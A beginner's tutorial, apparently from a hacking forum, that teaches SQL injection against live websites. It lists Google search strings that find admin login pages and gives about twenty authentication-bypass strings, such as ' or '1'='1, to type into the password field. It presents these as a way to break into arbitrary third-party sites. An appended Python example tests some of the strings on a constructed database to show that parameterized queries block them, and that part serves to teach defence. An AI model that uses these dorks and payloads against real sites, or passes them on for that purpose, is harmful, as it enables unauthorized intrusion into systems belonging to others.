SQL INJECTION TUTORIAL FOR BEGINNERS
What is SQL injection?
2. SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application.
3. First, let us find our target for SQL injection.
4. Open up Google, type in "inurl:admin.asp", and then press Enter.
5. You will get a list of sites like "http://www.mysite.com/admin.asp"; just click on any such site.
6. The other keywords to find the target are:
Code:
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
7. Once it's opened, it will prompt for a username and password.
8. We always give the username as "admin", and as the password we type our SQL injection as follows.
Code:
' or '1'='1
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Then click Submit and you're in.
Note: Won't work on all sites.
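Why these strings get past some login pages and not others, shown as an added example that is not part of the original tutorial: a login check built by string concatenation next to the same check written as a parameterized query. The table, the account and the function names are assumptions made for illustration, and Python's sqlite3 stands in for the site's real database.

```python
import sqlite3

def make_db():
    """In-memory database with one constructed account (sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; real apps store a salted hash.
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-constructed')")
    return db

def vulnerable_login(db, username, password):
    """Builds the query by string concatenation: input becomes SQL syntax."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    try:
        return db.execute(query).fetchone()[0] > 0
    except sqlite3.Error:
        return False  # the input broke the statement's syntax

def safe_login(db, username, password):
    """Parameterized query: input is bound as data, never parsed as SQL."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone()[0] > 0

# Password-field strings taken from the list above.
PAGE_INPUTS = ["' or '1'='1", "' or 'x'='x", "' or 1=1--", '" or "x"="x']

def compare(db):
    """Return {input: (concatenated_result, parameterized_result)} for 'admin'."""
    return {p: (vulnerable_login(db, "admin", p), safe_login(db, "admin", p))
            for p in PAGE_INPUTS}

if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, safe) in compare(db).items():
        print(f"{payload!r:16} concatenated={vuln} parameterized={safe}")
```

The double-quote string fails even against the concatenated query because this query wraps the value in single quotes, which is one reason the note above holds; the parameterized version rejects every entry regardless of quoting.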